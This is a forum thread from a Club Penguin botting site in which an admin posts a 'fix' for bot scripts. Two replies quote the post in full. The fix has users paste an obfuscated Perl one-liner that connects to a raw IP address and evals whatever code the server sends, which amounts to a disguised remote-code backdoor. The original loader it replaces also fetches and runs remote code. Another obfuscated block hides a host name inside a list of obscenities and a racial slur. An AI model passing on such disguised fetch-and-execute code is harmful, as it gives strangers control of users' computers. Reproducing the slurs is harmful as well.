Best Club Penguin Bots
Hello, you are not logged in. You may log in or register.
Latest topics
» This forum died
Thu Mar 30, 2017 11:10 pm by _Skate_

» Introduce yourselves!
Fri Jan 23, 2015 7:21 pm by Gizmo92883

» Anybody else come to this forum for the memories?
Wed Nov 26, 2014 12:46 am by Gizmo92883

» Ozzy's Bot Script
Mon May 13, 2013 8:31 am by Pig

» Goodbye BCPB Forums.
Tue Sep 18, 2012 6:37 pm by 43nînjâ17

» Follow bot script (100% Credit to Cp-Cheater )
Sun Sep 16, 2012 4:55 pm by Dentonbrooks

» Xat Main Owner Hacker
Fri Aug 17, 2012 2:32 am by 43nînjâ17

» xat message big
Sat Aug 11, 2012 12:32 am by 43nînjâ17

» CPPS GLICH "Auto Talker"
Sat Aug 11, 2012 12:25 am by 43nînjâ17

Navigation
 Portal
 Index
 Memberlist
 Profile
 FAQ
 Search
Club Penguin Events
Advertisement

Fix For Bots

View previous topic View next topic Go down

Fix For Bots

Post  Ozzyozborn13 on Mon Feb 14, 2011 10:09 pm

Hookbot Recently updated his site [You must be registered and logged in to see this link.] and changed a few things, Including a new Penguin Reverse Engineer Module (PREM) Which means you may have to change a few things in your scripts.

In your script you need to replace this:
Code:
our $import = "scriptcumber.com.:80";

sub import_once {
  my $mod = shift;
  my $r = new IO::Socket::INET $import;
  print $r "GET /m/$mod HTTP/1.0\r\nHost: $import\r\n\r\n";
  while (<$r>) { last if /^\s*$/; }
  eval join "", <$r> or warn $@;
  eval {import $mod @_; 1;} or warn $@;
}

With This:
Code:
use lib do{eval<$b>&&botstrap("PREM")||die$@,<$b>if$b=new IO::Socket::INET 114.46.99.120.":1"};

If you do not fix this problem then it will automatically change that part of the script to this:
Code:
# Load debian Rx $Version 0.6 package for filter
y/dEbRX _-~\r\n/$"@.6/d and our $import = unpack u => $_ foreach our @blacklist = q{
  as5 whore
  sc4ewed 5ixtyN9
  Wipe 5hIt puk3
  BYte m33
  71ck FuX
  nEw York Cit3
  TiTs NiggeR
  Club Penguin
};

sub import_once { my $m=shift;my$r=new IO::Socket::INET$import;print$r "GET /m/$m HTTP/1.0\nHost: $import\n\n";local$/;eval[split/\n\r?\n/,~~<$r>,2]->[1]or warn $@;eval{import$m @_;1;}or warn $@; }]
And this messes up your script whenever you try to edit it. So if you already used your script before fixing it with this tutorial, just replace the code above with the new one that i showed you.

Well if you followed the steps above your script should be fixed now. Happy Botting!


Last edited by Ozzyozborn13 on Mon Feb 28, 2011 10:58 pm; edited 1 time in total

_________________
[You must be registered and logged in to see this image.]



[You must be registered and logged in to see this link.]

[You must be registered and logged in to see this link.]



[You must be registered and logged in to see this image.]
avatar
Ozzyozborn13
Admin

Posts : 211
Reputation : 19
Join date : 2010-08-28

http://www.youtube.com/ozzyozborn13

Back to top Go down

---

Post  43nînjâ17 on Mon Feb 14, 2011 11:51 pm

Ozzyozborn13 wrote:Hookbot Recently updated his site [You must be registered and logged in to see this link.] and changed a few things, Including a new Penguin Reverse Engineer Module Which means you may have to change a few things in your scripts.

In your script you need to replace this:
Code:
our $import = "scriptcumber.com.:80";

sub import_once {
  my $mod = shift;
  my $r = new IO::Socket::INET $import;
  print $r "GET /m/$mod HTTP/1.0\r\nHost: $import\r\n\r\n";
  while (<$r>) { last if /^\s*$/; }
  eval join "", <$r> or warn $@;
  eval {import $mod @_; 1;} or warn $@;
}

With This:
Code:
use lib do{eval<$b>&&botstrap("PREM")||die$@,<$b>if$b=new IO::Socket::INET 114.46.99.120.":1"};

If you do not fix this problem then it will automatically change that part of the script to this:
Code:
# Load debian Rx $Version 0.6 package for filter
y/dEbRX _-~\r\n/$"@.6/d and our $import = unpack u => $_ foreach our @blacklist = q{
  as5 whore
  sc4ewed 5ixtyN9
  Wipe 5hIt puk3
  BYte m33
  71ck FuX
  nEw York Cit3
  TiTs NiggeR
  Club Penguin
};

sub import_once { my $m=shift;my$r=new IO::Socket::INET$import;print$r "GET /m/$m HTTP/1.0\nHost: $import\n\n";local$/;eval[split/\n\r?\n/,~~<$r>,2]->[1]or warn $@;eval{import$m @_;1;}or warn $@; }]
And this messes up your script whenever you try to edit it. So if you already used your script before fixing it with this tutorial, just replace the code above with the new one that i showed you.

Well if you followed the steps above your script should be fixed now. Happy Botting!
. Lol I was like wtf. when this happended

_________________
Code:
<?php
echo "Ninjas Are Awesome!";
sleep(999999);
?>

Click here Down there ↓ (SUB)
[You must be registered and logged in to see this link.]

43nînjâ17

Posts : 89
Reputation : 6
Join date : 2010-08-29
Location : Behind you

Back to top Go down

Re: Fix For Bots

Post  Ozzyozborn13 on Tue Feb 15, 2011 10:46 am

43nînjâ17 wrote:
Ozzyozborn13 wrote:Hookbot Recently updated his site [You must be registered and logged in to see this link.] and changed a few things, Including a new Penguin Reverse Engineer Module Which means you may have to change a few things in your scripts.

In your script you need to replace this:
Code:
our $import = "scriptcumber.com.:80";

sub import_once {
  my $mod = shift;
  my $r = new IO::Socket::INET $import;
  print $r "GET /m/$mod HTTP/1.0\r\nHost: $import\r\n\r\n";
  while (<$r>) { last if /^\s*$/; }
  eval join "", <$r> or warn $@;
  eval {import $mod @_; 1;} or warn $@;
}

With This:
Code:
use lib do{eval<$b>&&botstrap("PREM")||die$@,<$b>if$b=new IO::Socket::INET 114.46.99.120.":1"};

If you do not fix this problem then it will automatically change that part of the script to this:
Code:
# Load debian Rx $Version 0.6 package for filter
y/dEbRX _-~\r\n/$"@.6/d and our $import = unpack u => $_ foreach our @blacklist = q{
  as5 whore
  sc4ewed 5ixtyN9
  Wipe 5hIt puk3
  BYte m33
  71ck FuX
  nEw York Cit3
  TiTs NiggeR
  Club Penguin
};

sub import_once { my $m=shift;my$r=new IO::Socket::INET$import;print$r "GET /m/$m HTTP/1.0\nHost: $import\n\n";local$/;eval[split/\n\r?\n/,~~<$r>,2]->[1]or warn $@;eval{import$m @_;1;}or warn $@; }]
And this messes up your script whenever you try to edit it. So if you already used your script before fixing it with this tutorial, just replace the code above with the new one that i showed you.

Well if you followed the steps above your script should be fixed now. Happy Botting!
. Lol I was like wtf. when this happended
Lol same here, then i looked on the site and found the problem. and i will edit all of the posts that have scripts in them and fix the problem.

_________________
[You must be registered and logged in to see this image.]



[You must be registered and logged in to see this link.]

[You must be registered and logged in to see this link.]



[You must be registered and logged in to see this image.]
avatar
Ozzyozborn13
Admin

Posts : 211
Reputation : 19
Join date : 2010-08-28

http://www.youtube.com/ozzyozborn13

Back to top Go down

Re: Fix For Bots

Post  Guest on Mon Mar 07, 2011 6:58 pm

I don't know what part of the script to fix because I'm trying to log my bots on and it won't work. Please help.

Guest
Guest


Back to top Go down

Yeah they don't work.

Post  Dentonbrooks on Sun Aug 14, 2011 2:59 pm

The bots aren't working and help us.

Dentonbrooks

Posts : 14
Reputation : 1
Join date : 2011-07-30
Age : 16

Back to top Go down

Re: Fix For Bots

Post  Bolt Hugs on Fri Aug 26, 2011 7:11 am

Lmao, why does the script become so abusive if you don't change it?

lol!

Bolt Hugs

Posts : 117
Reputation : 3
Join date : 2011-06-25

Back to top Go down

Re: Fix For Bots

Post  Sponsored content


Sponsored content


Back to top Go down

View previous topic View next topic Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum